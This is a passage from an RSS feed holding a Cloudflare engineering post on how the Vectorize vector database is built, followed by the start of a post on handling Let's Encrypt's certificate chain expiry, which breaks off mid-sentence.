            <content:encoded><![CDATA[ <p><a href="https://developers.cloudflare.com/vectorize/"><u>Vectorize</u></a> is a globally distributed vector database that enables you to build full-stack, AI-powered applications with Cloudflare Workers. Vectorize makes querying embeddings — representations of values or objects like text, images, audio that are designed to be consumed by machine learning models and semantic search algorithms — faster, easier and more affordable.</p><p>In this post, we dive deep into how we built Vectorize on <a href="https://developers.cloudflare.com/"><u>Cloudflare’s Developer Platform</u></a>, leveraging Cloudflare’s <a href="https://www.cloudflare.com/network/"><u>global network</u></a>, <a href="https://developers.cloudflare.com/cache"><u>Cache</u></a>, <a href="https://developers.cloudflare.com/workers/"><u>Workers</u></a>, <a href="https://developers.cloudflare.com/r2/"><u>R2</u></a>, <a href="https://developers.cloudflare.com/queues/"><u>Queues</u></a>, <a href="https://developers.cloudflare.com/durable-objects"><u>Durable Objects</u></a>, and <a href="https://blog.cloudflare.com/container-platform-preview/"><u>container platform</u></a>.</p>
    <div>
      <h2>What is a vector database?</h2>
      <a href="#what-is-a-vector-database">
        
      </a>
    </div>
    <p>A <a href="https://www.cloudflare.com/learning/ai/what-is-vector-database/"><u>vector database</u></a> is a queryable store of vectors. A vector is a large array of numbers called vector dimensions.</p><p>A vector database has a <a href="https://en.wikipedia.org/wiki/Similarity_search"><u>similarity search</u></a> query: given an input vector, it returns the vectors that are closest according to a specified metric, potentially filtered on their metadata.</p><p><a href="https://blog.cloudflare.com/vectorize-vector-database-open-beta/#why-do-i-need-a-vector-database"><u>Vector databases are used</u></a> to power semantic search, document classification, and recommendation and anomaly detection, as well as contextualizing answers generated by LLMs (<a href="https://www.cloudflare.com/learning/ai/retrieval-augmented-generation-rag/"><u>Retrieval Augmented Generation, RAG</u></a>).</p>
    <div>
      <h3>Why do vectors require special database support?</h3>
      <a href="#why-do-vectors-require-special-database-support">
        
      </a>
    </div>
    <p>Conventional data structures like <a href="https://en.wikipedia.org/wiki/B-tree"><u>B-trees</u></a>, or <a href="https://en.wikipedia.org/wiki/Binary_search_tree"><u>binary search trees</u></a> expect the data they index to be cheap to compare and to follow a one-dimensional linear ordering. They leverage this property of the data to organize it in a way that makes search efficient. Strings, numbers, and booleans are examples of data featuring this property.</p><p>Because vectors are high-dimensional, ordering them in a one-dimensional linear fashion is ineffective for similarity search, as the resulting ordering doesn’t capture the proximity of vectors in the high-dimensional space. This phenomenon is often referred to as the <a href="https://en.wikipedia.org/wiki/Curse_of_dimensionality"><u>curse of dimensionality</u></a>.</p><p>In addition to this, comparing two vectors using distance metrics useful for similarity search is a computationally expensive operation, requiring vector-specific techniques for databases to overcome.</p>
    <div>
      <h2>Query processing architecture</h2>
      <a href="#query-processing-architecture">
        
      </a>
    </div>
    <p>Vectorize builds upon Cloudflare’s global network to bring fast vector search close to its users, and relies on many components to do so.</p><p>These are the Vectorize components involved in processing vector queries.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3iEISPtYCjwmggsjjQ4i14/dddac58c03a875ca258456b25f75df38/blog-2590-vectorize-01-query-read.png" />
          </figure><p>Vectorize runs in every <a href="https://www.cloudflare.com/network/"><u>Cloudflare data center</u></a>, on the infrastructure powering Cloudflare Workers. It serves traffic coming from <a href="https://developers.cloudflare.com/workers/runtime-apis/bindings/"><u>Worker bindings</u></a> as well as from the <a href="https://developers.cloudflare.com/api/operations/vectorize-list-vectorize-indexes"><u>Cloudflare REST API</u></a> through our API Gateway.</p><p>Each query is processed on a server in the data center in which it enters, picked in a fashion that spreads the load across all servers of that data center.</p><p>The Vectorize DB Service (a Rust binary) running on that server processes the query by reading the data for that index on <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a>, Cloudflare’s object storage. It does so by reading through <a href="https://developers.cloudflare.com/cache"><u>Cloudflare’s Cache</u></a> to speed up I/O operations.</p>
    <div>
      <h2>Searching vectors, and indexing them to speed things up</h2>
      <a href="#searching-vectors-and-indexing-them-to-speed-things-up">
        
      </a>
    </div>
    <p>Being a vector database, Vectorize features a similarity search query: given an input vector, it returns the K vectors that are closest according to a specified metric.</p><p>Conceptually, this similarity search consists of 3 steps:</p><ol><li><p>Evaluate the proximity of the query vector with every vector present in the index.</p></li><li><p>Sort the vectors based on their proximity “score”.</p></li><li><p>Return the top matches.</p></li></ol><p>While this method is accurate and effective, it is computationally expensive and does not scale well to indexes containing millions of vectors (see <b>Why do vectors require special database support?</b> above).</p><p>To do better, we need to prune the search space, that is, avoid scanning the entire index for every query.</p><p>For this to work, we need to find a way to discard vectors we know are irrelevant for a query, while focusing our efforts on those that might be relevant.</p>
    <div>
      <h3>Indexing vectors with IVF</h3>
      <a href="#indexing-vectors-with-ivf">
        
      </a>
    </div>
    <p>Vectorize prunes the search space for a query using an indexing technique called <a href="https://blog.dailydoseofds.com/p/approximate-nearest-neighbor-search"><u>IVF, Inverted File Index</u></a>.</p><p>IVF clusters the index vectors according to their relative proximity. For each cluster, it then identifies its centroid, the center of gravity of that cluster, a high-dimensional point minimizing the distance with every vector in the cluster.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1q48ixmjKRsTkBdTR6SbSR/1c0ba3c188a78150e74ef3baf849ae7e/blog-2590-vectorize-02-ivf-index.png" />
          </figure><p>Once the list of centroids is determined, each centroid is given a number. We then structure the data on storage by placing each vector in a file named like the centroid it is closest to.</p><p>When processing a query, we then can then focus on relevant vectors by looking only in the centroid files closest to that query vector, effectively pruning the search space.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3BjkRvCyT4fEgVqIHGkwQg/d692e167dc34fe5b09e94a5ebb29fe28/image8.png" />
          </figure>
    <div>
      <h3>Compressing vectors with PQ</h3>
      <a href="#compressing-vectors-with-pq">
        
      </a>
    </div>
    <p>Vectorize supports vectors of up to 1536 dimensions. At 4 bytes per dimension (32 bits float), this means up to 6 KB per vector. That’s 6 GB of uncompressed vector data per million vectors that we need to fetch from storage and put in memory.</p><p>To process multi-million vector indexes while limiting the CPU, memory, and I/O required to do so, Vectorize uses a <a href="https://en.wikipedia.org/wiki/Dimensionality_reduction"><u>dimensionality reduction</u></a> technique called <a href="https://en.wikipedia.org/wiki/Vector_quantization"><u>PQ (Product Quantization)</u></a>. PQ compresses the vectors data in a way that retains most of their specificity while greatly reducing their size — a bit like down sampling a picture to reduce the file size, while still being able to tell precisely what’s in the picture — enabling Vectorize to efficiently perform similarity search on these lighter vectors.</p><p>In addition to storing the compressed vectors, their original data is retained on storage as well, and can be requested through the API; the compressed vector data is used only to speed up the search.</p>
    <div>
      <h3>Approximate nearest neighbor search and result accuracy refining</h3>
      <a href="#approximate-nearest-neighbor-search-and-result-accuracy-refining">
        
      </a>
    </div>
    <p>By pruning the search space and compressing the vector data, we’ve managed to increase the efficiency of our query operation, but it is now possible to produce a set of matches that is different from the set of true closest matches. We have traded result accuracy for speed by performing an <a href="https://en.wikipedia.org/wiki/Nearest_neighbor_search#Approximation_methods"><u>approximate nearest neighbor search</u></a>, reaching an accuracy of ~80%.</p><p>To boost the <a href="https://blog.cloudflare.com/workers-ai-bigger-better-faster/#how-fast-is-vectorize"><u>result accuracy up to over 95%</u></a>, Vectorize then <a href="https://developers.cloudflare.com/vectorize/best-practices/query-vectors/#control-over-scoring-precision-and-query-accuracy"><u>performs a result refinement pass</u></a> on the top approximate matches using uncompressed vector data, and returns the best refined matches.</p>
    <div>
      <h2>Eventual consistency and snapshot versioning</h2>
      <a href="#eventual-consistency-and-snapshot-versioning">
        
      </a>
    </div>
    <p>Whenever you query your Vectorize index, you are guaranteed to receive results which are read from a consistent, immutable snapshot — even as you write to your index concurrently. Writes are applied in strict order of their arrival in our system, and they are funneled into an asynchronous process. We update the index files by reading the old version, making changes, and writing this updated version as a new object in R2. Each index file has its own version number, and can be updated independently of the others. Between two versions of the index we may update hundreds or even thousands of IVF and metadata index files, but even as we update the files, your queries will consistently use the current version until it is time to switch.</p><p>Each IVF and metadata index file has its own version. The list of all versioned files which make up the snapshotted version of the index is contained within a <i>manifest file</i>. Each version of the index has its own manifest. When we write a new manifest file based on the previous version, we only need to update references to the index files which were modified; if there are files which weren't modified, we simply keep the references to the previous version.</p><p>We use a <i>root manifest</i> as the authority of the current version of the index. This is the pivot point for changes. The root manifest is a copy of a manifest file from a particular version, which is written to a deterministic location (the root of the R2 bucket for the index). When our async write process has finished processing vectors, and has written all new index files to R2, we <i>commit</i> by overwriting the current root manifest with a copy of the new manifest. PUT operations in R2 are atomic, so this effectively makes our updates atomic. Once the manifest is updated, Vectorize DB Service instances running on our network will pick it up, and use it to serve reads.</p><p>Because we keep past versions of index and manifest files, we effectively maintain versioned snapshots of your index. This means we have a straightforward path towards building a point-in-time recovery feature (similar to <a href="https://developers.cloudflare.com/d1/reference/time-travel/"><u>D1's Time Travel feature</u></a>).</p><p>You may have noticed that because our write process is asynchronous, this means Vectorize is <i>eventually consistent</i> — that is, there is a delay between the successful completion of a request writing on the index, and finally seeing those updates reflected in queries.  This isn't always ideal for all data storage use cases. For example, imagine two users using an online ticket reservation application for airline tickets, where both users buy the same seat — one user will successfully reserve the ticket, and the other will eventually get an error saying the seat was taken, and they need to choose again. Because a vector index is not typically used as a primary database for these transactional use cases, we decided eventual consistency was a worthy trade off in order to ensure Vectorize queries would be fast, high-throughput, and cheap even as the size of indexes grew into the millions.</p>
    <div>
      <h2>Coordinating distributed writes: it's just another block in the WAL</h2>
      <a href="#coordinating-distributed-writes-its-just-another-block-in-the-wal">
        
      </a>
    </div>
    <p>In the section above, we touched on our eventually consistent, asynchronous write process. Now we'll dive deeper into our implementation. </p>
    <div>
      <h3>The WAL</h3>
      <a href="#the-wal">
        
      </a>
    </div>
    <p>A <a href="https://en.wikipedia.org/wiki/Write-ahead_logging"><u>write ahead log</u></a> (WAL) is a common technique for making atomic and durable writes in a database system. Vectorize’s WAL is implemented with <a href="https://blog.cloudflare.com/sqlite-in-durable-objects/"><u>SQLite in Durable Objects</u></a>.</p><p>In Vectorize, the payload for each update is given an ID, written to R2, and the ID for that payload is handed to the WAL Durable Object which persists it as a "block." Because it's just a pointer to the data, the blocks are lightweight records of each mutation.</p><p>Durable Objects (DO) have many benefits — strong transactional guarantees, a novel combination of compute and storage, and a high degree of horizontal scale — but individual DOs are small allotments of memory and compute. However, the process of updating the index for even a single mutation is resource intensive — a single write may include thousands of vectors, which may mean reading and writing thousands of data files stored in R2, and storing a lot of data in memory. This is more than what a single DO can handle.</p><p>So we designed the WAL to leverage DO's strengths and made it a coordinator. It controls the steps of updating the index by delegating the heavy lifting to beefier instances of compute resources (which we call "Executors"), but uses its transactional properties to ensure the steps are done with strong consistency. It safeguards the process from rogue or stalled executors, and ensures the WAL processing continues to move forward. DOs are easy to scale, so we create a new DO instance for each Vectorize index.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7l5hw2yVkyGKpU8xTMyX8f/743941bd273731bdb3dbf8110afc2526/unnamed.png" />
          </figure>
    <div>
      <h3>WAL Executor</h3>
      <a href="#wal-executor">
        
      </a>
    </div>
    <p>The executors run from a single pool of compute resources, shared by all WALs. We use a simple producer-consumer pattern using <a href="https://developers.cloudflare.com/queues/"><u>Cloudflare Queues</u></a>. The WAL enqueues a request, and executors poll the queue. When they get a request, they call an API on the WAL requesting to be <i>assigned </i>to the request.</p><p>The WAL ensures that one and only one executor is ever assigned to that write. As the executor writes, the index files and the updated manifest are written in R2, but they are not yet visible. The final step is for the executor to call another API on the WAL to <i>commit</i> the change — and this is key — it passes along the updated manifest. The WAL is responsible for overwriting the root manifest with the updated manifest. The root manifest is the pivot point for atomic updates: once written, the change is made visible to Vectorize’s database service, and the updated data will appear in queries.</p><p>From the start, we designed this process to account for non-deterministic errors. We focused on enumerating failure modes first, and only moving forward with possible design options after asserting they handled the possibilities for failure. For example, if an executor stalls, the WAL finds a new executor. If the first executor comes back, the coordinator will reject its attempt to commit the update. Even if that first executor is working on an old version which has already been written, and writes new index files and a new manifest to R2, they will not overwrite the files written from the committed version.</p>
    <div>
      <h3>Batching updates</h3>
      <a href="#batching-updates">
        
      </a>
    </div>
    <p>Now that we have discussed the general flow, we can circle back to one of our favorite features of the WAL. On the executor, the most time-intensive part of the write process is reading and writing many files from R2. Even with making our reads and writes concurrent to maximize throughput, the cost of updating even thousands of vectors within a single file is dwarfed by the total latency of the network I/O. Therefore it is more efficient to maximize the number of vectors processed in a single execution.</p><p>So that is what we do: we batch discrete updates. When the WAL is ready to request work from an executor, it will get a chunk of "blocks" off the WAL, starting with the next un-written block, and maintaining the sequence of blocks. It will write a new "batch" record into the SQLite table, which ties together that sequence of blocks, the version of the index, and the ID of the executor assigned to the batch.</p><p>Users can batch multiple vectors to update in a single insert or upsert call. Because the size of each update can vary, the WAL adaptively calculates the optimal size of its batch to increase throughput. The WAL will fit as many upserted vectors as possible into a single batch by counting the number of updates represented by each block. It will batch up to 200,000 vectors at once (a value we arrived at after our own testing) with a limit of 1,000 blocks. With this throughput, we have been able to quickly load millions of vectors into an index (with upserts of 5,000 vectors at a time). Also, the WAL does not pause itself to collect more writes to batch — instead, it begins processing a write as soon as it arrives. Because the WAL only processes one batch at a time, this creates a natural pause in its workflow to batch up writes which arrive in the meantime.</p>
    <div>
      <h3>Retraining the index</h3>
      <a href="#retraining-the-index">
        
      </a>
    </div>
    <p>The WAL also coordinates our process for retraining the index. We occasionally re-train indexes to ensure the mapping of IVF centroids best reflects the current vectors in the index. This maintains the high accuracy of the vector search.</p><p>Retraining produces a completely new index. All index files are updated; vectors have been reshuffled across the index space. For this reason, all indexes have a second version stamp — which we call the <i>generation</i> — so that we can differentiate between retrained indexes. </p><p>The WAL tracks the state of the index, and controls when the training is started. We have a second pool of processes called "trainers." The WAL enqueues a request on a queue, then a trainer picks up the request and it begins training.</p><p>Training can take a few minutes to complete, but we do not pause writes on the current generation. The WAL will continue to handle writes as normal. But the training runs from a fixed snapshot of the index, and will become out-of-date as the live index gets updated in parallel. Once the trainer has completed, it signals the WAL, which will then start a multi-step process to switch to the new generation. It enters a mode where it will continue to record writes in the WAL, but will stop making those writes visible on the current index. Then it will begin catching up the retrained index with all of the updates that came in since it started. Once it has caught up to all data present in the index when the trainer signaled the WAL, it will switch over to the newly retrained index. This prevents the new index from appearing to "jump back in time." All subsequent writes will be applied to that new index.</p><p>This is all modeled seamlessly with the batch record. Because it associates the index version with a range of WAL blocks, multiple batches can span the same sequence of blocks as long as they belong to different generations. We can say this another way: a single WAL block can be associated with many batches, as long as these batches are in different generations. Conceptually, the batches act as a second WAL layered over the WAL blocks.</p>
    <div>
      <h2>Indexing and filtering metadata</h2>
      <a href="#indexing-and-filtering-metadata">
        
      </a>
    </div>
    <p>Vectorize supports metadata filters on vector similarity queries. This allows a query to focus the vector similarity search on a subset of the index data, yielding matches that would otherwise not have been part of the top results.</p><p>For instance, this enables us to query for the best matching vectors for <code>color: “blue” </code>and <code>category: ”robe”</code>.</p><p>Conceptually, what needs to happen to process this example query is:</p><ul><li><p>Identify the set of vectors matching <code>color: “blue”</code> by scanning all metadata.</p></li><li><p>Identify the set of vectors matching <code>category: “robe”</code> by scanning all metadata.</p></li><li><p>Intersect both sets (boolean AND in the filter) to identify vectors matching both the color and category filter.</p></li><li><p>Score all vectors in the intersected set, and return the top matches.</p></li></ul><p>While this method works, it doesn’t scale well. For an index with millions of vectors, processing the query that way would be very resource intensive. What’s worse, it prevents us from using our IVF index to identify relevant vector data, forcing us to compute a proximity score on potentially millions of vectors if the filtered set of vectors is large.</p><p>To do better, we need to prune the metadata search space by indexing it like we did for the vector data, and find a way to efficiently join the vector sets produced by the metadata index with our IVF vector index.</p>
    <div>
      <h3>Indexing metadata with Chunked Sorted List Indexes</h3>
      <a href="#indexing-metadata-with-chunked-sorted-list-indexes">
        
      </a>
    </div>
    <p>Vectorize maintains one metadata index per filterable property. Each filterable metadata property is indexed using a Chunked Sorted List Index.</p><p>A Chunked Sorted List Index is a sorted list of all distinct values present in the data for a filterable property, with each value mapped to the set of vector IDs having that value. This enables Vectorize to <a href="https://en.wikipedia.org/wiki/Binary_search"><u>binary search</u></a> a value in the metadata index in <a href="https://www.geeksforgeeks.org/what-is-logarithmic-time-complexity/"><u>O(log n)</u></a> complexity, in other words about as fast as search can be on a large dataset.</p><p>Because it can become very large on big indexes, the sorted list is chunked in pieces matching a target weight in KB to keep index state fetches efficient.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7wRfqvPKtRx9RX5clyapxt/9630152212779ac008efc9685538f48e/blog-2590-vectorize-03-chunked-sorted-list.png" />
          </figure><p>A lightweight chunk descriptor list is maintained in the index manifest, keeping track of the list chunks and their lower/upper values. This chunk descriptor list can be binary searched to identify which chunk would contain the searched metadata value.</p><p>Once the candidate chunk is identified, Vectorize fetches that chunk from index data and binary searches it to take the set of vector IDs matching a metadata value if found, or an empty set if not found.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6leIbnEGLN2qRitRXxoqog/01d5cfaad6e9e537b27bbc15933c1db0/blog-2590-vectorize-04-chunked-sorted-list-2.png" />
          </figure><p>We identify the matching vector set this way for every predicate in the metadata filter of the query, then intersect the sets in memory to determine the final set of vectors matched by the filters.</p><p>This is just half of the query being processed. We now need to identify the vectors most similar to the query vector, within those matching the metadata filters.</p>
    <div>
      <h3>Joining the metadata and vector indexes</h3>
      <a href="#joining-the-metadata-and-vector-indexes">
        
      </a>
    </div>
    <p>A vector similarity query always comes with an input vector. We can rank all centroids of our IVF vector index based on their proximity with that query vector.</p><p>The vector set matched by the metadata filters contains for each vector its ID and IVF centroid number.</p><p>From this, Vectorize derives the number of vectors matching the query filters per IVF centroid, and determines which and how many top-ranked IVF centroids need to be scanned according to the number of matches the query asks for.</p><p>Vectorize then performs the IVF-indexed vector search (see the section <b>Searching Vectors, and indexing them to speed things up</b> above<b>)</b> by considering only the vectors in the filtered metadata vector set while doing so.</p><p>Because we’re effectively pruning the vector search space using metadata filters, filtered queries can often be faster than their unfiltered equivalent.</p>
    <div>
      <h2>Query performance</h2>
      <a href="#query-performance">
        
      </a>
    </div>
    <p>The performance of a system is measured in terms of latency and throughput.</p><p>Latency is a measure relative to individual queries, evaluating the time it takes for a query to be processed, usually expressed in milliseconds. It is what an end user perceives as the “speed” of the service, so a lower latency is desirable.</p><p>Throughput is a measure relative to an index, evaluating the number of queries it can process concurrently over a period of time, usually expressed in requests per second or RPS. It is what enables an application to scale to thousands of simultaneous users, so a higher throughput is desirable.</p><p>Vectorize is designed for great index throughput and optimized for low query latency to deliver great performance for demanding applications. <a href="https://blog.cloudflare.com/workers-ai-bigger-better-faster/#how-fast-is-vectorize"><u>Check out our benchmarks</u></a>.</p>
    <div>
      <h3>Query latency optimization</h3>
      <a href="#query-latency-optimization">
        
      </a>
    </div>
    <p>As a distributed database keeping its data state on blob storage, Vectorize’s latency is primarily driven by the fetch of index data, and relies heavily on <a href="https://developers.cloudflare.com/cache"><u>Cloudflare’s network of caches</u></a> as well as individual server RAM cache to keep latency low.</p><p>Because Vectorize data is snapshot versioned, (see <b>Eventual consistency and snapshot versioning</b> above), each version of the index data is immutable and thus highly cacheable, increasing the latency benefits Vectorize gets from relying on Cloudflare’s cache infrastructure.</p><p>To keep the index data lean, Vectorize uses techniques to reduce its weight. In addition to Product Quantization (see <b>Compressing vectors with PQ</b> above), index files use a space-efficient binary format optimized for runtime performance that Vectorize is able to use without parsing, once fetched.</p><p>Index data is fragmented in a way that minimizes the amount of data required to process a query. Auxiliary indexes into that data are maintained to limit the amount of fragments to fetch, reducing overfetch by jumping straight to the relevant piece of data on mass storage.</p><p>Vectorize boosts all vector proximity computations by leveraging <a href="https://en.wikipedia.org/wiki/Single_instruction,_multiple_data"><u>SIMD CPU instructions</u></a>, and by organizing the vector search in 2 passes, effectively balancing the latency/result accuracy ratio (see <b>Approximate nearest neighbor search and result accuracy refining</b> above).</p><p>When used via a Worker binding, each query is processed close to the server serving the worker request, and thus close to the end user, minimizing the network-induced latency between the end user, the Worker application, and Vectorize.</p>
    <div>
      <h3>Query throughput</h3>
      <a href="#query-throughput">
        
      </a>
    </div>
    <p>Vectorize runs in every Cloudflare data center, on thousands of servers across the world.</p><p>Thanks to the snapshot versioning of every index’s data, every server is simultaneously able to serve the index concurrently, without contention on state.</p><p>This means that a Vectorize index elastically scales horizontally with its distributed traffic, providing very high throughput for the most demanding Worker applications.</p>
    <div>
      <h2>Increased index size</h2>
      <a href="#increased-index-size">
        
      </a>
    </div>
    <p>We are excited that our upgraded version of Vectorize can support a maximum of 5 million vectors, which is a 25x improvement over the limit in beta (200,000 vectors). All the improvements we discussed in this blog post contribute to this increase in vector storage. <a href="https://blog.cloudflare.com/workers-ai-bigger-better-faster/#how-fast-is-vectorize"><u>Improved query performance</u></a> and throughput comes with this increase in storage as well.</p><p>However, 5 million may be constraining for some use cases. We have already heard this feedback. The limit falls out of the constraints of building a brand new globally distributed stateful service, and our desire to iterate fast and make Vectorize generally available so builders can confidently leverage it in their production apps.</p><p>We believe builders will be able to leverage Vectorize as their primary vector store, either with a single index or by sharding across multiple indexes. But if this limit is too constraining for you, please let us know. Tell us your use case, and let's see if we can work together to make Vectorize work for you.</p>
    <div>
      <h2>Try it now!</h2>
      <a href="#try-it-now">
        
      </a>
    </div>
    <p>Every developer on a free plan can give Vectorize a try. You can <a href="https://developers.cloudflare.com/vectorize/"><u>visit our developer documentation to get started</u></a>.</p><p>If you’re looking for inspiration on what to build, <a href="http://developers.cloudflare.com/vectorize/get-started/embeddings/"><u>see the semantic search tutorial</u></a> that combines <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> and Vectorize for document search, running entirely on Cloudflare. Or an example of <a href="https://developers.cloudflare.com/workers-ai/tutorials/build-a-retrieval-augmented-generation-ai/"><u>how to combine OpenAI and Vectorize</u></a> to give an LLM more context and dramatically improve the accuracy of its answers.</p><p>And if you have questions about how to use Vectorize for our product &amp; engineering teams, or just want to bounce an idea off of other developers building on Workers AI, join the #vectorize and #workers-ai channels on our <a href="https://discord.cloudflare.com/"><u>Developer Discord</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Engineering]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Edge Database]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Storage]]></category>
            <guid isPermaLink="false">2UYBSJmJKD66lXTstsRhTg</guid>
            <dc:creator>Jérôme Schneider</dc:creator>
            <dc:creator>Alex Graham</dc:creator>
        </item>
        <item>
            <title><![CDATA[How we ensure Cloudflare customers aren't affected by Let's Encrypt's certificate chain change]]></title>
            <link>https://blog.cloudflare.com/shortening-lets-encrypt-change-of-trust-no-impact-to-cloudflare-customers/</link>
            <pubDate>Fri, 12 Apr 2024 13:00:09 GMT</pubDate>
            <description><![CDATA[ Let’s Encrypt’s cross-signed chain will be expiring in September. This will affect legacy devices with outdated trust stores (Android versions 7.1.1 or older). To prevent this change from impacting customers, Cloudflare will shift Let’s Encrypt certificates upon renewal to use a different CA ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7xrPBUpEjsmaBkRYhxiRIr/c95f42fffef36c7d595422b4724c8665/Untitled--3--1.png" />
            
            </figure><p><a href="https://letsencrypt.org/">Let’s Encrypt</a>, a publicly trusted certificate authority (CA) that Cloudflare uses to issue TLS certificates, has been relying on two distinct certificate chains. One is cross-signed with <a href="https://www.identrust.com/">IdenTrust</a>, a globally trusted CA that has been around since 2000, and the other is Let’s Encrypt’s own root CA, ISRG Root X1. Since Let’s Encrypt launched, <a href="https://letsencrypt.org/certificates/#root-certificates">ISRG Root X1</a> has been steadily gaining its own device compatibility.</p><p>On September 30, 2024, Let’s Encrypt’s certificate chain cross-signed with IdenTrust will <a href="https://letsencrypt.org/2023/07/10/cross-sign-expiration.html">expire</a>. After the cross-sign expires, servers will no longer be able to serve certificates signed by the cross-signed chain. Instead, all Let’s Encrypt certificates will use the ISRG Root X1 CA.</p><p>Most devices and browser versions released after 2016 will not experience any issues as a result of the change since the ISRG Root X1 will already be installed in those clients’ trust stores. That's because these modern browsers and operating systems were built to be agile and flexible, with upgradeable trust stores that can be updated to include new certificate authorities.</p><p>The change in the certificate chain will impact legacy devices and systems, such as devices running Android version 7.1.1 (released in 2016) or older, as those exclusively rely on the cross-signed chain and lack the ISRG X1 root in their trust store. These clients will encounter TLS errors or warnings when accessing domains secured by a Let’s Encrypt certificate. We took a look at the data ourselves and found that, of all Android requests, 2.96% of them come from devices that will be affected by the change. That’s a substantial portion of traffic that will lose access to the Internet. We’re committed to keeping those users online and will modify our certificate pipeline so that we can continue to serve users on older devices without requiring any manual modifications from our customers.</p>
    <div>
      <h3>A better Internet, for everyone</h3>
      <a href="#a-better-internet-for-everyone">
        
      </a>
    </div>
    <p>In the past, we invested in efforts like <a href="/sha-1-deprecation-no-browser-left-behind/">“No Browsers Left Behind”</a> to help ensure that we could continue to support clients as SHA-1 based algorithms were being deprecated. Now, we’re applying the same approach for the upcoming Let’s Encrypt change.</p><p>We have made the decision to remove Let’s Encrypt as a certificate authority from all flows where Cloudflare dictates the CA, impacting Universal SSL customers and those using SSL for SaaS with the “default CA” choice.</p><p>Starting in June 2024, one certificate lifecycle (90 days) before the cross-sign chain expires, we’ll begin migrating Let’s Encrypt certificates that are up for renewal to use a different CA, one that ensures compatibility with older devices affected by the change. That means that going forward, customers will only receive Let’s Encrypt certificates if they explicitly request Let’s Encrypt as the CA.</p><p>The change that Let's Encrypt is making is a necessary one. For us to move forward in supporting new standards and protocols, we need to make the Public Key Infrastructure (PKI) ecosystem more agile. By retiring the cross-signed chain, Let’s Encrypt is pushing devices, browsers, and clients to support adaptable trust stores.</p><p>However, we’ve observed <a href="/sha-1-deprecation-no-browser-left-behind/">changes like this in the past</a> and while they push the adoption of new standards, they disproportionately impact users in economically disadvantaged regions, where access to new technology is limited.</p><p>Our mission is to help build a better Internet and that means supporting users worldwide. We previously published a <a href="/upcoming-lets-encrypt-certificate-chain-change-and-impact-for-cloudflare-customers">blog post about the Let’s Encrypt change</a>, asking customers to switch their certificate authority if they expected any impact. However, determining the impact of the change is challenging. Error rates due to trust store incompatibility are primarily logged on clients, reducing the visibility that domain owners have. In addition, while there might be no requests incoming from incompatible devices today, it doesn’t guarantee uninterrupted access for a user tomorrow.</p><p>Cloudflare’s certificate pipeline has evolved over the years to be resilient and flexible, allowing us to seamlessly adapt to changes like this without any negative impact to our customers.  </p>
    <div>
      <h3>How Cloudflare has built a robust TLS certificate pipeline</h3>
      <a href="#how-cloudflare-has-built-a-robust-tls-certificate-pipeline">
        
      </a>
    </div>
    <p>Today, Cloudflare manages tens of millions of certificates on behalf of customers. For us, a successful pipeline means:</p><ol><li><p>Customers can always obtain a TLS certificate for their domain</p></li><li><p>CA related issues have zero impact on our customer’s ability to obtain a certificate</p></li><li><p>The best security practices and modern standards are utilized</p></li><li><p>Optimizing for future scale</p></li><li><p>Supporting a wide range of clients and devices</p></li></ol><p>Every year, we introduce new optimizations into our certificate pipeline to maintain the highest level of service. Here’s how we do it…</p>
    <div>
      <h3>Ensuring customers can always obtain a TLS certificate for their domain</h3>
      <a href="#ensuring-customers-can-always-obtain-a-tls-certificate-for-their-domain">
        
      </a>
    </div>
    <p>Since the launch of Universal SSL in 2014, Cloudflare has been responsible for issuing and serving a TLS certificate for every domain that’s protected by our network. That might seem trivial, but there are a few steps that have to successfully execute in order for a domain to receive a certificate:</p><ol><li><p>Domain owners need to complete <a href="https://developers.cloudflare.com/ssl/edge-certificates/changing-dcv-method/">Domain Control Validation</a> for every certificate issuance and renewal.</p></li><li><p>The certificate authority needs to verify the Domain Control Validation tokens to issue the certificate.</p></li><li><p><a href="https://developers.cloudflare.com/ssl/edge-certificates/troubleshooting/caa-records/">CAA records</a>, which dictate which CAs can be used for a domain, need to be checked to ensure only authorized parties can issue the certificate.</p></li><li><p>The certificate authority must be available to issue the certificate.</p></li></ol><p>Each of these steps requires coordination across a number of parties — domain owners, CDNs, and certificate authorities. At Cloudflare, we like to be in control when it comes to the success of our platform. That’s why we make it our job to ensure each of these steps can be successfully completed.</p><p>We ensure that every certificate issuance and renewal requires minimal effort from our customers. To get a certificate, a domain owner has to complete Domain Control Validation (DCV) to prove that it does in fact own the domain. Once the certificate request is initiated, the CA will return DCV tokens which the domain owner will need to place in a DNS record or an HTTP token. If you’re using Cloudflare as your DNS provider, Cloudflare completes DCV on your behalf by automatically placing the TXT token returned from the CA into your DNS records. Alternatively, if you use an external DNS provider, we offer the option to <a href="/introducing-dcv-delegation/">Delegate DCV</a> to Cloudflare for automatic renewals without any customer intervention.</p><p>Once DCV tokens are placed, Certificate Authorities (CAs) verify them. CAs conduct this <a href="/secure-certificate-issuance">verification from multiple vantage points</a> to prevent spoofing attempts. However, since these checks are done from multiple countries and ASNs (Autonomous Systems), they may trigger a Cloudflare WAF rule which can cause the DCV check to get blocked. We made sure to update our WAF and security engine to recognize that these requests are coming from a CA to ensure they're never blocked so DCV can be successfully completed.</p><p>Some customers have CA preferences, due to internal requirements or compliance regulations. To prevent an unauthorized CA from issuing a certificate for a domain, the domain owner can create a Certification Authority Authorization (CAA) DNS record, specifying which CAs are allowed to issue a certificate for that domain. To ensure that customers can always obtain a certificate, we check the CAA records before requesting a certificate to know which CAs we should use. If the CAA records block all of the <a href="https://developers.cloudflare.com/ssl/reference/certificate-authorities/">CAs that are available</a> in Cloudflare’s pipeline and the customer has not uploaded a certificate from the CA of their choice, then we add CAA records on our customers’ behalf to ensure that they can get a certificate issued. Where we can, we optimize for preference. Otherwise, it’s our job to prevent an 